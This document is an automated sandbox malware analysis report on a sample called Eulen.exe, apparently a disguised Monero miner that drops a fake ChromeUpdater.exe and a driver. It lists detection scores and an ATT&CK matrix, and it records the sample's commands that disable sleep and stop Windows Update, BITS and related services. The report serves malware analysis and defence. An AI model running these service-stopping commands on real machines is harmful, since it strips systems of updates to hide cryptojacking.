Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\dialer.exe

Code function: 14_2_00007FF647341C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

14_2_00007FF647341C64

Source: C:\Windows\System32\winlogon.exe

Code function: 19_2_000002E991757A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

19_2_000002E991757A40

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior

Stops critical windows services

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	2 Disable or Modify Tools	2 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	11 Windows Service	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	2 Credential API Hooking	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	Logon Script (Windows)	1 Access Token Manipulation	1 Obfuscated Files or Information	Security Account Manager	222 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	11 Windows Service	1 Install Root Certificate	NTDS	621 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	813 Process Injection	11 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 File Deletion	Cached Domain Credentials	121 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Rootkit	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	121 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	813 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Hidden Files and Directories	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Eulen.exe	16%	ReversingLabs
Eulen.exe	100%	Avira	HEUR/AGEN.1325655

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	100%	Avira	HEUR/AGEN.1325655
C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmp	100%	Avira	HEUR/AGEN.1362795
C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmp	100%	Joe Sandbox ML
C:\Windows\Temp\auqpbnqlvfdv.tmp	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	16%	ReversingLabs
C:\Program Files\Google\Libs\WR64.sys	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmp	92%	ReversingLabs	Win64.Trojan.Heracles
C:\Windows\Temp\auqpbnqlvfdv.tmp	70%	ReversingLabs	Win64.Trojan.DisguisedXMRigMiner

Name	Source	Malicious	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538245397.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2688295152.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	false	high
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2004/09/policy	lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/erties	lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/soap12/	lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crl.mic	powershell.exe, 0000000F.00000002.1601184621.0000015DE9224000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crl.micft.cMicRosof	powershell.exe, 0000000F.00000002.1601184621.0000015DE9224000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/02/trust	lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	false	high
https://aka.ms/pscore68	powershell.exe, 0000000F.00000002.1566783925.0000015D80001000.00000004.00000800.00020000.00000000.sdmp	false	high
http://docs.oasis-open.org/ws-sx/ws-trust/200512	lsass.exe, 00000016.00000000.1538245397.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2688295152.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp	false	high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	false	high
http://schemas.micro	svchost.exe, 00000020.00000002.2696354530.000001486A5B0000.00000002.00000001.00040000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000F.00000002.1566783925.0000015D80001000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1551907
Start date and time:	2024-11-08 11:27:27 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	23
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Eulen.exe
Detection:	MAL
Classification:	mal100.spyw.evad.mine.winEXE@50/71@0/0
EGA Information:	Successful, ratio: 89.5%
HCA Information:	Successful, ratio: 66% Number of executed functions: 81 Number of non-executed functions: 390
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, xmr-us-east1.nanopool.org, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 8116 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Eulen.exe

Simulations

Behavior and APIs

Time	Type	Description
05:28:29	API Interceptor	1x Sleep call for process: Eulen.exe modified
05:28:31	API Interceptor	41x Sleep call for process: powershell.exe modified
05:28:54	API Interceptor	1x Sleep call for process: ChromeUpdater.exe modified
05:29:06	API Interceptor	322506x Sleep call for process: winlogon.exe modified
05:29:08	API Interceptor	235846x Sleep call for process: lsass.exe modified
05:29:08	API Interceptor	4471x Sleep call for process: svchost.exe modified
05:29:11	API Interceptor	288856x Sleep call for process: dwm.exe modified
11:28:39	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files\Google\Libs\WR64.sys	U9jAFGWgPG.exe	Get hash	malicious	Phorpiex, Xmrig	Browse
	file.exe	Get hash	malicious	Amadey, Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	ICBM.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	ICBM.exe	Get hash	malicious	Xmrig	Browse
	ICBM.exe	Get hash	malicious	Xmrig	Browse
	ahlntQUj2t.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse

Created / dropped Files

